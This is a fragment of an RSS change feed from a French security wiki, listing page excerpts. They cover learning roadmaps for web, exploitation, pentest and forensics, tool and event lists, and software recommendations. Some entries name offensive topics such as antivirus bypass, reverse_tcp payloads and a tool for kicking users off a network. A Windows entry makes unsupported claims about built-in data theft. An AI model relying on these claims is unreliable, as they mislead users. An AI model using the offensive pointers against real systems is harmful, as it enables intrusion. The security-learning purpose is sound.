        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 NodeJsScan is a static security code scanner for Node.js applications. &lt;https://github.com/ajinabraham/NodeJsScan&gt;

🛠 NodeSS: Node.js Security Scanner  &lt;https://github.com/eon01/NodeSS&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=kernel_land&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>kernel_land</title>
        <link>http://wiki.zenk-security.com/doku.php?id=kernel_land&amp;rev=1491744837&amp;do=diff</link>
        <description>Cette page a pour but de réunir différents articles sur la programmation système et noyau

	*  Programmation de Modules Kernels sous Linux : Un document pour apprendre à manipuler et programmer les Modules Kernels de Linux</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=kit_pentest_android&amp;rev=1657115066&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2022-07-06T15:44:26+02:00</dc:date>
        <title>kit_pentest_android</title>
        <link>http://wiki.zenk-security.com/doku.php?id=kit_pentest_android&amp;rev=1657115066&amp;do=diff</link>
        <description>🛠 AAPG [A]ndroid [A]pplication [P]entest [G]uide &lt;https://nightowl131.github.io/AAPG/&gt;

🛠 WifiKill : Sert à Voir qui est connecté sur votre réseau local puis le deconnecter de votre réseau  à la façon de Netcut sur PC

🛠 zAnti : Cette App est un Backtrack-like qui contrôle vos appareils a distance en reseau local, malheuresement elle est payante</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=les_achats_en_chine&amp;rev=1509793009&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T11:56:49+02:00</dc:date>
        <title>les_achats_en_chine</title>
        <link>http://wiki.zenk-security.com/doku.php?id=les_achats_en_chine&amp;rev=1509793009&amp;do=diff</link>
        <description>Liste de fournisseurs chinois

	*   aliexpress.com (marketplace) - Grand classique. Très grande collection d'objets, service client assez bon, ils seront de votre côté si vous avez un litige avec un vendeur et que celui-ci est dans l'erreur, tout comme Ebay. Possibilité d'utiliser leur service Alipay pour le payement qui permet de cacher les détails de votre carte bancaire au vendeur, tout comme Paypal.
	*   banggood.com - Accepte Paypal et vous pouvez commander sans faire un compte. Ils possède…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=les_pre-requis&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>les_pre-requis</title>
        <link>http://wiki.zenk-security.com/doku.php?id=les_pre-requis&amp;rev=1491744837&amp;do=diff</link>
        <description>*  Apprendre l'HTML et le CSS -&gt; Lien 
	*  Apprendre le Javascript -&gt; Lien 
	*  Apprendre le PHP -&gt; Lien - Lien - Lien 
	*  Savoir à quoi sert le fichier robots.txt et en quoi celui-ci peut être utile dans la collecte d'information -&gt; Lien - Lien 
	*  Comprendre comment fonctionne le vol de sessions -&gt; Lien
	*  Liste numérotéeApprendre à éxploiter les XSS, persistantes et et non persistantes -&gt; Lien - Lien - Lien - Lien - Lien 
	*  Apprendre à exploiter les CSRF -&gt; Lien - Lien 
	*  Apprendre à é…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_cryptographie&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>les_pre-requis_cryptographie</title>
        <link>http://wiki.zenk-security.com/doku.php?id=les_pre-requis_cryptographie&amp;rev=1491744837&amp;do=diff</link>
        <description>*  Comprendre comment fonctionne la substitution monoalphabetique (cesar et dérivé) Lien1 Lien2 Lien3 Lien4
	*  Comprendre Vigenere et les moyens de le compromettre Lien1 Lien2 Lien3
	*  Comprendre RSA Lien1 Lien2
	*  Comprendre AES Lien1 Lien2 Lien3
	*  Comprendre DES Lien1 Lien2
	*  Comprendre 3DES Lien1
	*  Se familiariser avec les concepts de la cryptanalyse Lien1 Lien2</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_failles_applicatives&amp;rev=1512987206&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-12-11T11:13:26+02:00</dc:date>
        <title>les_pre-requis_failles_applicatives</title>
        <link>http://wiki.zenk-security.com/doku.php?id=les_pre-requis_failles_applicatives&amp;rev=1512987206&amp;do=diff</link>
        <description>*  Réaliser les prérequis &quot;Rétro-ingénierie&quot; 1 à 4 
	*  Exploiter une faille system() Lien1 
	*  Exploiter une Race Condition Lien1 Lien2 Lien3   
	*  Exploiter un Buffer Overflow et en profiter pour Apprendre un langage de Script pour automatiser l'éxploitation Lien1 Lien2  
	*  Exploiter un Format String Lien1 Lien2 Lien3   
	*  Exploiter un Heap Overflow via malloc() et un off-by-one Lien1 Lien2 Lien3 Lien4 Lien5 Lien6 Lien7 Lien8        
	*  Apprendre à exploiter un use-after-free Lien1 Lien…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_forensic&amp;rev=1492090240&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-13T15:30:40+02:00</dc:date>
        <title>les_pre-requis_forensic</title>
        <link>http://wiki.zenk-security.com/doku.php?id=les_pre-requis_forensic&amp;rev=1492090240&amp;do=diff</link>
        <description>*  Procédure forensique lien1 lien2
	*  Architecture disques durs lien1
	*  Processus de boot lien1
	*  MBR lien1 lien2
	*  Live memory lien1 lien2
	*  Analyse de logs lien1

	*  Windows file systems (FAT, NTFS) lien1 lien2
	*  Registres lien1

	*  Linux file systems (ext2/3) lien1 lien2 lien3</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_pentesting&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>les_pre-requis_pentesting</title>
        <link>http://wiki.zenk-security.com/doku.php?id=les_pre-requis_pentesting&amp;rev=1491744837&amp;do=diff</link>
        <description>*  Avoir au moins déjà réalisé les prérequis des listes Failles Applicatives de 1 à 5 et Réseau de 1 à 11, des connaissances en Web sont un plus
	*  Assimiler les notions d'exploits et de payloads
	*  Comprendre comment marche un anti-virus (analyse heuristique et recherche de signatures)
	*  Comprendre comment bypasser les protections antivirus (modification de signature, packer, binder, race condition...)
	*  Comprendre les avantages et les inconvénients d'un payload de type reverse_tcp contre…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_reseau&amp;rev=1433676573&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2015-06-07T13:29:33+02:00</dc:date>
        <title>les_pre-requis_reseau</title>
        <link>http://wiki.zenk-security.com/doku.php?id=les_pre-requis_reseau&amp;rev=1433676573&amp;do=diff</link>
        <description>FIXME Cette page est en court de rédaction, n'hésitez pas à y apporter votre contribution.

Pour bien aborder le réseau il faut en comprendre la logique et donc remonter aux sources des réseaux. La raison qui a nécessité de connecter entre eux des ordinateurs est cruciale et explique les efforts fournit à l'époque de la création des réseaux. Pour autant ces réseaux n'étaient que les embryons de ce que nous connaissons aujourd'hui sous cette appellation et le réseaux des réseaux, l'Internet, n'ét…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_retro-ingenierie&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>les_pre-requis_retro-ingenierie</title>
        <link>http://wiki.zenk-security.com/doku.php?id=les_pre-requis_retro-ingenierie&amp;rev=1491744837&amp;do=diff</link>
        <description>*  Apprendre le C Lien Lien2 Lien3
	*  Maitriser des différentes bases de numération (binaire, hexa, octal, base64) Lien1
	*  Apprendre l'ASM et reverser ses programmes en C avec un désassembleur Lien1 Lien2 Lien3 Lien4
	*  Bosser sur des crack-me pour se faire la main (Prenez l'habitude de bosser dans une machine virtuelle, c'est plus safe) Lien1 Lien2
	*  Unpack de programme packé avec UPX Lien1 Lien2
	*  Unpack de programme packé avec Yoda's Protector Lien1
	*  Connaitre le fonctionnement du …</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_steganographie&amp;rev=1474285629&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2016-09-19T13:47:09+02:00</dc:date>
        <title>les_pre-requis_steganographie</title>
        <link>http://wiki.zenk-security.com/doku.php?id=les_pre-requis_steganographie&amp;rev=1474285629&amp;do=diff</link>
        <description>*  Comprendre le format BMP  Lien1 -  Lien2
	*  Maîtriser les différents principes de stéganographie sur le BMP  Lien1 -  Lien2 -  Lien3
	*  Voir quels formats de fichier sont les plus exploités et par quels techniques  Lien1

	*   Exiv2 
	*   TweakPNG 
	*   Stegsolve 
	*   pngcheck 
	*   Steghide</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_web&amp;rev=1581197376&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-02-08T22:29:36+02:00</dc:date>
        <title>les_pre-requis_web</title>
        <link>http://wiki.zenk-security.com/doku.php?id=les_pre-requis_web&amp;rev=1581197376&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

	*  Introduction Lien

	*  Apprendre l'HTML et le CSS -&gt; Lien 
	*  Apprendre le Javascript -&gt; Lien 
	*  Apprendre le PHP -&gt; Lien - Lien - Lien 
	*  Savoir à quoi sert le fichier robots.txt et en quoi celui-ci peut être utile dans la collecte d'information -&gt; Lien - Lien 
	*  Comprendre comment fonctionne le vol de sessions -&gt; Lien
	*  Apprendre à exploiter les XSS, persistantes et non persistantes…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=les_pre_requis_systeme&amp;rev=1433680345&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2015-06-07T14:32:25+02:00</dc:date>
        <title>les_pre_requis_systeme</title>
        <link>http://wiki.zenk-security.com/doku.php?id=les_pre_requis_systeme&amp;rev=1433680345&amp;do=diff</link>
        <description>*  Les commandes Linux  Lien
	*  Comprendre le fonctionnement des processus linux  Lien

	*   Windows Internals 
	*   Windows Sysinternals Administrator's Reference
	*  Advanced linux programming [Ebook] VF</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liberte&amp;rev=1597238424&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-08-12T15:20:24+02:00</dc:date>
        <title>liberte</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liberte&amp;rev=1597238424&amp;do=diff</link>
        <description>[Never forget.]


















C'est ce que nous recherchons tous. 

Atteindre la liberté totale dans l'utilisation de la technologie est la plus grande réalisation qu'un homme puisse atteindre. 

Il y a des rumeurs que lorsque cela se produit, de la lumière dorée commence à émaner de l'écran de votre ordinateur et Richard Stallman se matérialise dans votre chambre. 

Il a écrit la GPL pour vous aider à atteindre cet état de nirvana. 

Afin d'avoir une vraie liberté, selon la GPL, vous devez …</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=licences&amp;rev=1509893032&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-05T15:43:52+02:00</dc:date>
        <title>licences</title>
        <link>http://wiki.zenk-security.com/doku.php?id=licences&amp;rev=1509893032&amp;do=diff</link>
        <description>Il existe de nombreuses licences de droits d'auteur publiques disponibles pour utilisation avec des logiciels, des œuvres d'art et d'autres œuvres créatives. Ils permettent aux auteurs d'accorder à d'autres des autorisations de redistribution et de modification qui, autrement, violeraient les droits d'auteur normaux. Veuillez noter que le droit d'auteur est distinct du droit des brevets et des marques. Ceux-ci peuvent imposer des restrictions supplémentaires à l'utilisation d'une œuvre.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=linus_torvalds&amp;rev=1517075743&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-27T18:55:43+02:00</dc:date>
        <title>linus_torvalds</title>
        <link>http://wiki.zenk-security.com/doku.php?id=linus_torvalds&amp;rev=1517075743&amp;do=diff</link>
        <description>Linus Torvalds est le créateur du noyau Linux et du système de contrôle de version Git. Il est ingénieur logiciel finno-américain et est employé par la Linux Foundation en tant que coordinateur du projet Linux.

Linux



Unix était un système d'exploitation vraiment bien fait, mais beaucoup de gens n'aimaient pas le fait qu'il s'agissait d'un logiciel propriétaire. GNU visait à remplacer Unix par son propre système d'exploitation gratuit. Ils ont commencé cet effort en construisant les composant…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=linux&amp;rev=1572001344&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T13:02:24+02:00</dc:date>
        <title>linux</title>
        <link>http://wiki.zenk-security.com/doku.php?id=linux&amp;rev=1572001344&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

Guide complet : &lt;https://github.com/trimstray/the-practical-linux-hardening-guide&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liste_d_extension_burp&amp;rev=1578088906&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-01-03T23:01:46+02:00</dc:date>
        <title>liste_d_extension_burp</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liste_d_extension_burp&amp;rev=1578088906&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

	*  Burp Suite extension to discover assets from HTTP response using passive #scanning. &lt;https://github.com/redhuntlabs/BurpSuite-Asset_Discover&gt;
	*  [summitt/Burp-Non-HTTP-Extension: Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite.](&lt;https://github.com/summitt/Burp-Non-HTTP-Extension&gt;)
	*  [SpiderLabs/Airachnid-Burp-Extension: A Burp Extension to test applications for vulnerabilit…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liste_d_outil_en_ligne&amp;rev=1577960342&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-01-02T11:19:02+02:00</dc:date>
        <title>liste_d_outil_en_ligne</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liste_d_outil_en_ligne&amp;rev=1577960342&amp;do=diff</link>
        <description>🛠  Online Curl - curl test, analyze HTTP Response Headers. &lt;https://tools.keycdn.com/curl&gt;

🛠  Online Tools for Developers - HTTP API tools, testers, encoders, converters, formatters, and other tools. &lt;https://extendsclass.com/&gt;

🛠  Ping.eu - online Ping, Traceroute, DNS lookup, WHOIS and others. &lt;https://ping.eu/&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_android&amp;rev=1509813986&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T17:46:26+02:00</dc:date>
        <title>liste_de_logiciels_recommandes_pour_android</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_android&amp;rev=1509813986&amp;do=diff</link>
        <description>&quot;App Stores&quot;

	*  F-Droid (FOSS Repo)
	*  Aptoide
	*  ApkTrack

Navigateur webs

	*  Firefox for Android
	*  Google Chrome for Android
	*  Chromium
	*  Lightning
	*  Naked Browser

Communications

	*  Signal
	*  Silence 
	*  Xabber — supporte OTR
	*  Conversations — Client XMPP god tier qui supporte OMEMO, GPG, et OTR.
	*  DEPRECATED
	*  K-9 Mail (Email)
	*  Telegram (IM)
	*  Antox
	*  QKSMS</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_gnu_linux&amp;rev=1523562712&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-04-12T21:51:52+02:00</dc:date>
        <title>liste_de_logiciels_recommandes_pour_gnu_linux</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_gnu_linux&amp;rev=1523562712&amp;do=diff</link>
        <description>Communications

Navigateurs

 Chromium
Chromium Un navigateur libre et gratuit basé sur le code sous-jacent de Chrome. Bien que presque identique au navigateur de Google, Chromium ne possède pas de composant propriétaires comme la mise à jour automatique, le lecteur flash, etc... et n’inclus pas les fonctionnalités de pistages de Chrome.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_os_x&amp;rev=1509801285&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T14:14:45+02:00</dc:date>
        <title>liste_de_logiciels_recommandes_pour_os_x</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_os_x&amp;rev=1509801285&amp;do=diff</link>
        <description>Gestionnaire de paquets

	*  Homebrew — Gratuit 

	*  MacPorts — Gratuit 

	*  Portage — Gratuit 


Émulateurs de terminal

	*  iTerm 2 — Gratuit 

	*  TotalTerminal — Gratuit 


Communication

Navigateurs web

Clients Email

	*  Thunderbird 

	*  Airmail — $2 

	*  Opera Mail</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_windows&amp;rev=1640281613&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2021-12-23T18:46:53+02:00</dc:date>
        <title>liste_de_logiciels_recommandes_pour_windows</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_windows&amp;rev=1640281613&amp;do=diff</link>
        <description>Windows 10 est déconseillé en raison du fait qu'il ait été conçu pour faire de la fouille de données et du vol de données utilisateur. 

Windows 7 est considéré comme sûr si vous supprimez les mises à jour de télémétrie fournies par Microsoft. Non seulement ça, mais il existe un élément suspect dans la base de registre connu sous le nom &quot;NSAKEY&quot; qui existe depuis Windows NT 4. 

En raison de ces problèmes, utilisez tous les systèmes windows avec une extrême prudence.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liste_des_entreprises_en_securite_informatique&amp;rev=1343670498&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2012-07-30T19:48:18+02:00</dc:date>
        <title>liste_des_entreprises_en_securite_informatique</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liste_des_entreprises_en_securite_informatique&amp;rev=1343670498&amp;do=diff</link>
        <description>Dans le cadre d'une recherche de stage, de cdi ou de changement de postes, une liste des entreprises qui travaillent dans le domaine de la sécurité informatique. Pour chaque boîte est indiqué, le type d'entreprise, ses activités, sa ou ses localisations (concernant les groupes, je vous invite à consulter le site officiel afin d'avoir plus d'infos). Bonne recherche !</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liste_des_evenements_cybersecurite_2018_en_france&amp;rev=1558439430&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-05-21T13:50:30+02:00</dc:date>
        <title>liste_des_evenements_cybersecurite_2018_en_france</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liste_des_evenements_cybersecurite_2018_en_france&amp;rev=1558439430&amp;do=diff</link>
        <description>Bonjour,

On aime tous se rassembler sur la thématique de la cyber sécurité. On a tous raté des événements en se disant ”Mince si j'avais su avant que cet événement était dans ma ville cette soirée, j'y serai allé”

Je propose que nous maintenons à jour se topic qui ?contiendra la liste des évènements de 2018 publique et non commerciaux en France à propos de la cyber sécurité. Svp faites aussi un peu de communication sur l'IRC dès qu'un nouvel événement est rajouté.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liste_des_evenements_cybersecurite_2019_en_france&amp;rev=1576057247&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-12-11T10:40:47+02:00</dc:date>
        <title>liste_des_evenements_cybersecurite_2019_en_france</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liste_des_evenements_cybersecurite_2019_en_france&amp;rev=1576057247&amp;do=diff</link>
        <description>Bonjour, 

On aime tous se rassembler sur la thématique de la cyber sécurité. On a tous raté des événements en se disant ”Mince si j'avais su avant que cet événement était dans ma ville cette soirée, j'y serai allé”

Je propose que nous maintenons à jour se topic qui ?contiendra la liste des évènements de 2019 publique et non commerciaux en France à propos de la cyber sécurité. Svp faites aussi un peu de communication sur l'IRC dès qu'un nouvel événement est rajouté.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liste_des_evenements_cybersecurite_2020_en_france&amp;rev=1588080352&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-04-28T15:25:52+02:00</dc:date>
        <title>liste_des_evenements_cybersecurite_2020_en_france</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liste_des_evenements_cybersecurite_2020_en_france&amp;rev=1588080352&amp;do=diff</link>
        <description>Si vous voulez rajouter un événement , rajoutez le au PAD collaboratif :

&lt;https://pad.zenk-security.com/p/merci&gt;

Janvier

Meet hackerzvoice,  majinboo nous fera un talk “write-up” sur le chall &lt;http://2020.wargame.rocks&gt;, Paris, 11 janvier, &lt;https://hackerzvoice.net/node/1226&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=liste_des_gros_evenements_cybersecurite_2018_en_europe&amp;rev=1549873039&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-02-11T09:17:19+02:00</dc:date>
        <title>liste_des_gros_evenements_cybersecurite_2018_en_europe</title>
        <link>http://wiki.zenk-security.com/doku.php?id=liste_des_gros_evenements_cybersecurite_2018_en_europe&amp;rev=1549873039&amp;do=diff</link>
        <description>Si vous aussi vous avez envie de voyager et ne pas rater un des plus gros événements en sécurité informatique en Europe. 
Voici la liste des 5 plus gros événements sécu par pays en Europe à ne pas manquer.

Allemagne

Troopers @WEareTROOPERS 	Heidelberg, March 12-16 2018</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=listes_des_choses_utiles_indispensables&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>listes_des_choses_utiles_indispensables</title>
        <link>http://wiki.zenk-security.com/doku.php?id=listes_des_choses_utiles_indispensables&amp;rev=1491744837&amp;do=diff</link>
        <description>*  Savoir utiliser les Regexp Lien1 Lien2 Lien3 Lien4
	*  Connaitre un langage de script afin d'automatiser certaines taches (Ruby, Python, Perl...) Lien1 Lien2 Lien3
	*  Se familiariser avec les système d'exploitation linux/unix, la majorité des tools s'y trouvant (c'est presque indispensable en fait...) Lien1 Lien2
	*  Savoir créer une machine virtuelle (pas indispensable mais ubber pratique) Lien1 Lien2
	*  Savoir lire l'anglais, sans vouloir décourager les anglophobes, la majorité de la docu…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=livres&amp;rev=1517087216&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-27T22:06:56+02:00</dc:date>
        <title>livres</title>
        <link>http://wiki.zenk-security.com/doku.php?id=livres&amp;rev=1517087216&amp;do=diff</link>
        <description>Livres

Distribués dans une variété de formats tels que .pdf et .mobi, les livres sont des liasses de textes destinés à des fins éducatives ou de divertissement.

Les livres audio (parfois appelés livres parlants) sont des fichiers audio dans lesquels une personne qui parle bien vous lit le livre, semblable à un podcast.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=mark_shuttleworth&amp;rev=1517073526&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-27T18:18:46+02:00</dc:date>
        <title>mark_shuttleworth</title>
        <link>http://wiki.zenk-security.com/doku.php?id=mark_shuttleworth&amp;rev=1517073526&amp;do=diff</link>
        <description>[Mark Shuttleworth utilisant un PC dans l'ISS.]

Mark Shuttleworth (né le 18 septembre 1973 à Welkom, État libre d'Orange) est un entrepreneur anglo-sud-africain principalement connu pour avoir créé Canonical Ltd. qui développe le système d'exploitation Ubuntu. Il fut également l'un des premiers touristes de l'espace et le premier citoyen africain à voyager dans l'espace.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=materiel_libre&amp;rev=1510107002&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-08T03:10:02+02:00</dc:date>
        <title>materiel_libre</title>
        <link>http://wiki.zenk-security.com/doku.php?id=materiel_libre&amp;rev=1510107002&amp;do=diff</link>
        <description>[routage de la carte Arduino Mega 2560]
 

 

Matériel libre, (alternativement, matériel Open-source, matériel ouvert) est un périphérique ou un composant avec lequel des schémas détaillés et/ou d'autres informations sont disponibles pour quiconque souhaitant l'améliorer ou le modifier. Le terme signifie le plus souvent que certaines des informations sur le matériel est facilement discernable pour que d'autres puissent le faire - en le couplant étroitement au mouvement du DIY. La conception maté…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=mbr&amp;rev=1510513978&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-12T20:12:58+02:00</dc:date>
        <title>mbr</title>
        <link>http://wiki.zenk-security.com/doku.php?id=mbr&amp;rev=1510513978&amp;do=diff</link>
        <description>Définition

Le MBR ou Master Boot Record et le premier secteur d'un disque ou d'un clé USB. Il contient différentes informations qui permettent l'identification du disque, l'identification des partitions et le démarrage du système d'exploitation.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=memoire_vive&amp;rev=1510515381&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-12T20:36:21+02:00</dc:date>
        <title>memoire_vive</title>
        <link>http://wiki.zenk-security.com/doku.php?id=memoire_vive&amp;rev=1510515381&amp;do=diff</link>
        <description>Outils d'extraction

	*  LiME : &lt;https://github.com/504ensicsLabs/LiME&gt;
	*  pmem :
		*  Linux : &lt;https://github.com/google/rekall/releases/download/v1.5.1/linpmem-2.1.post4&gt;
		*  Mac : &lt;https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip&gt;
		*  Windows : &lt;https://github.com/google/rekall/releases/download/v1.5.1/winpmem-2.1.post4.exe&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=methodologie_et_outils_libres&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>methodologie_et_outils_libres</title>
        <link>http://wiki.zenk-security.com/doku.php?id=methodologie_et_outils_libres&amp;rev=1491744837&amp;do=diff</link>
        <description>Le Forensic (sous entendu Computer Forensic), en français appelé analyse forensique ou plus souvent investigation numérique, est l'art et la technique d'analyser un système mort (ordinateur, téléphone portable ...) dans le but d'en sortir les éléments de preuves.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=mots_de_passe&amp;rev=1762335896&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-11-05T10:44:56+02:00</dc:date>
        <title>mots_de_passe</title>
        <link>http://wiki.zenk-security.com/doku.php?id=mots_de_passe&amp;rev=1762335896&amp;do=diff</link>
        <description>Les mots de passe sont souvent compromis hors ligne en cassant leur hachage. Pratiquement tous les mois, un énorme site Web avec des millions d'utilisateurs se fait piraté et ça base de données rendue publique ou vendue au plus offrant. La plus grande base de données à ce jour de mot de passe est RockYou.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=musique&amp;rev=1622310648&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2021-05-29T19:50:48+02:00</dc:date>
        <title>musique</title>
        <link>http://wiki.zenk-security.com/doku.php?id=musique&amp;rev=1622310648&amp;do=diff</link>
        <description>Ambiant

Quand fait correctement, la musique ambiante 'doit être aussi ignorable qu'intéressante'. Cela en fait l'un des meilleurs genres de musique à écouter tout en programmant ou en faisant une autre activité qui exige un plus haut niveau de concentration et d'attention.
Ci-dessous vous trouverez quelques exemples, bien que vous êtes encouragé a chercher par vous même sur le Web ce qui vous correspond le mieux.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=natas_wargame&amp;rev=1352472295&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2012-11-09T15:44:55+02:00</dc:date>
        <title>natas_wargame</title>
        <link>http://wiki.zenk-security.com/doku.php?id=natas_wargame&amp;rev=1352472295&amp;do=diff</link>
        <description>&quot;Natas teaches the basics of serverside web-security.

Each level of natas consists of its own website located at &lt;http://natasX.natas.labs.overthewire.org&gt;, where X is the level number. There is no SSH login. To access a level, enter the username for that level (e.g. natas0 for level 0) and its password.

Each level has access to the password of the next level. Your job is to somehow obtain that next password and &gt;level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ndh2k12_public&amp;rev=1360341919&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-02-08T17:45:19+02:00</dc:date>
        <title>ndh2k12_public</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ndh2k12_public&amp;rev=1360341919&amp;do=diff</link>
        <description>Link : &lt;http://wargame.nuitduhack.com/&gt;

Web

Workerz 1500 pts

InjectMe 1000 pts

Zombie Online Massive Game 1000 pts

Personal Blog 500 pts

Pastag Auth 500 pts

Crackme

Lost USB key 1000 pts

Stay Alive 500 pts

Crackme Bukkake 500 pts

Engage le jeu que je le gagne 500 pts</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public&amp;rev=1404156546&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2014-06-30T21:29:06+02:00</dc:date>
        <title>ndh2k14_wargame_public</title>
